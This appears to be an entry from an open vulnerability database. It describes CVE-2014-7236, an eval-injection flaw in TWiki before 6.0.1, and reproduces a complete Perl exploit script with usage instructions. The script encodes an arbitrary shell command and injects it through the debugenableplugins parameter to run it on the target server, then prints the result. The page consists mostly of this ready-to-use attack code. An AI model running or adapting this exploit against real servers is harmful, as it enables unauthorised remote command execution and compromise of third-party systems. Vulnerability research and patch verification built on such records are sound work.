免费、自由、人人可编辑的漏洞库
,
INFO
Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.
Usage
perl exploit.pl host cmd ex. perl exploit.pl http://127.0.0.1/Main/WebHome "uname -a"
EXP
#!/usr/bin/perl
=cut
TWiki code execution CVE-2014-7236
m0nad <m0nad/at/email.com>
ref: http://seclists.org/fulldisclosure/2014/Oct/44
=cut
use LWP::Simple;
use strict;
use diagnostics;
use warnings;
sub banner
{
print "* TWiki code execution CVE-2014-7236\n";
print "* m0nad <m0nad/at/email.com>\n";
}
sub usage
{
print "? usage: perl $0 <host> cmd\n";
print "? ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n";
exit;
}
sub exploit
{
my ($host, $cmd) = @_;
$cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl";
my $byte = join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));
my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit";
my $res = get $host . $payload;
print "- Exploit Failed\n" and exit unless ($res =~ m/start_xpl\n(.*?)end_xpl/ms);
print "+ $1";
}
banner();
my $host = shift || usage();
my $cmd = shift || "echo Vulnerable!";
exploit($host, $cmd);
免费、自由、人人可编辑的漏洞库
